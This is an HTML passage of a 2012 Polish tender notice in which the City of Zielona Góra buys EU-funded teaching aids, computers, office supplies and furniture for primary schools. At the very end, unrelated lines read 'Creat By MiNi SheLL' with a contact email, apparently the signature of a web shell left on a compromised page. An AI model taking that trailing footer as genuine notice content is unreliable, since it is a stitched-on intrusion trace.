<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. zadanie współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - projekt pn. Indywidualizacja nauczania i wychowania uczniów klas I-III z Miasta Zielona Góra;
2. Otwarcie ofert nastąpi w dniu 10 sierpnia 2012 roku o godz. 10:15 w siedzibie Zamawiającego tj. w Urzędzie Miasta Zielona Góra, ul. Podgórna 22, pokój nr 810.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa pomocy i sprzętu dydaktycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje zakup wraz z dostawą pomocy i sprzętu dydaktycznego do prowadzenia następujących zajęć dla dzieci:
1)	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji;
2)	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych;
3)	Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy;
4)	Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej;
5)	Gimnastyka korekcyjna dla dzieci z wadami postawy;
6)	Specjalistyczne zajęcia terapeutyczne dla dzieci niepełnosprawnych;
7)	Specjalistyczne zajęcia terapeutyczne dla dzieci;
8)	Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych;
9)	Zajęcia rozwijające różnego rodzaju zainteresowania uczniów szczególnie uzdolnionych;
2. Rodzaj, ilość pomocy i sprzętu wraz z wymaganymi minimalnymi parametrami oraz numery szkół, do których Wykonawca powinien dostarczyć przedmiot zamówienia zawarte są 
w Formularzu cen jednostkowych stanowiącym załącznik nr 5A do SIWZ. Wykonawca zobowiązany jest dostarczyć pomoce i sprzęt dydaktyczny do szkół w pogrupowanych pakietach według załącznika nr 6 do SIWZ.
3. Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na okres zgodny z gwarancją producenta od dnia odbioru dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 22.11.00.00-4, 37.52.41.00-8, 37.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa zestawu biofeedback.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje zakup wraz z dostawą zestawu specjalistycznego sprzętu do zajęć terapeutycznych biofeedback umożliwiającego trening poprawiający efektywność pracy mózgu ucznia i kontrolę nad procesami fizjologicznymi zachodzącymi w organizmie.
2.	Cechy sprzętu wraz z wymaganymi minimalnymi parametrami zawarte są w Formularzu cen jednostkowych stanowiącym załącznik nr 5B do SIWZ. Wykonawca zobowiązany jest dostarczyć zestaw do SP 11 według załącznika nr 6 do SIWZ.
3.	Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na okres zgodny z gwarancją producenta od dnia odbioru dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup i dostawa wyposażenia pracowni modelarskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje zakup wraz z dostawą wyposażenia pracowni modelarskiej, tj.: materiałów konstrukcyjnych, elementów elektronicznych oraz narzędzi do budowy modeli latających.
2.	Rodzaj oraz ilości materiałów, elementów oraz narzędzi służących do budowy modeli latających wraz z wymaganymi minimalnymi parametrami zawarte są w Formularzu cen jednostkowych stanowiącym załącznik nr 5C do SIWZ. Wykonawca zobowiązany jest dostarczyć wyposażenie pracowni do SP 11 według załącznika nr 6 do SIWZ.
3.	Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi
na okres zgodny z gwarancją producenta od dnia odbioru dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.10.00.00-1, 31.70.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup i dostawa sprzętu multimedialnego i oprogramowania komputerowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje zakup wraz z dostawą następującego sprzętu multimedialnego i oprogramowania komputerowego:
1)	stacja robocza z ekranem dotykowym: 1 szt. (SP nr 1);
2)	zestaw komputerowy: 1 szt. (SP nr 8);
3)	komputer przenośny: notebook: 14 szt. (SP nr 5, SP nr 6, SP nr 8, SP nr 10 - 2 szt., SP nr 11 - 3 szt., SP nr 14, SP nr 17, SP nr 18 - 2 szt., SP nr 21, SP nr 16);
4)	pamięć przenośna (pendrive):  48 szt. (SP nr 1 - 9 szt., SP 11 - 38 szt., SP nr 21 - 1 szt.);
5)	drukarka laserowa: 3 szt. (SP nr 6, SP nr 8, SP nr 10);
6)	drukarka atramentowa kolorowa: 5 szt. (SP nr 17 - 1 szt., SP nr 11 - 4 szt.);
7)	rzutnik multimedialny: 1 szt. (SP nr 14);
8)	mysz optyczna: 12 szt. (SP nr 16);
9)	klawiatura: 13 szt. (SP nr 16);
10)	słuchawki z mikrofonem: 12 szt. (SP nr 16);
11)	radiomagnetofon/odtwarzacz CD: 23 szt. (SP nr 5 - 1 szt., SP nr 10 - 7 szt., SP nr 11 - 15 szt.);
12)	mikrofon MP3: 1 szt. (SP 21);
13)	dyktafon: 1 szt. (SP nr 17);
14)	oprogramowanie komputerowe: 1 szt. (SP nr 6);
15)	ekran do projekcji: 2 szt. (SP nr 10);
16)	elektryczny ekran projekcyjny: 1 szt. (SP nr 14); 
2.	Rodzaj, ilość sprzętu multimedialnego i oprogramowania komputerowego wraz 
z wymaganymi minimalnymi parametrami oraz numery szkół, do których Wykonawca powinien dostarczyć przedmiot zamówienia opisane są w Formularzu cen jednostkowych stanowiącym załącznik nr 5D do SIWZ. Wykonawca zobowiązany jest dostarczyć sprzęt w pogrupowanych pakietach według załącznika nr 6 do SIWZ.
3.	Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi
na okres zgodny z gwarancją producenta od dnia odbioru dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2, 30.21.30.00-5, 30.21.31.00-6, 30.23.45.00-3, 48.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup i dostawa materiałów biurowych i eksploatacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje zakup wraz z dostawą materiałów biurowych i eksploatacyjnych, tj.: segregatory, teczki, tonery, tusze do drukarek, papier do drukarek (ksero), płyty CD, karty do kserokopiarki.
2.	Rodzaj, ilość i wymagane cechy materiałów oraz numery szkół, do których Wykonawca powinien dostarczyć przedmiot zamówienia opisane są w Formularzu cen jednostkowych stanowiącym załącznik nr 5E do SIWZ. Wykonawca zobowiązany jest dostarczyć ww. materiały w pogrupowanych pakietach według załącznika nr 6 do SIWZ.
3.	Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na okres zgodny z gwarancją producenta od dnia odbioru dostawy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakup i dostawa mebli szkolnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje zakup wraz z dostawą mebli szkolnych: biurka komputerowe, fotele obrotowe, regały, szafki, szafa, stoliki uczniowskie typu Z, krzesła uczniowskie typu Z, ławki sportowe (gimnastyczne).
2.	Rodzaj, ilość, wymagane cechy i minimalne parametry mebli oraz numery szkół, do których Wykonawca powinien dostarczyć przedmiot zamówienia opisane są w Formularzu cen jednostkowych stanowiącym załącznik nr 5F do SIWZ. Wykonawca zobowiązany jest dostarczyć sprzęt w pogrupowanych pakietach według załącznika nr 6 do SIWZ.
3.	Meble powinny być zmontowane na koszt Wykonawcy. Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na okres zgodny z gwarancją producenta od dnia odbioru dostawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com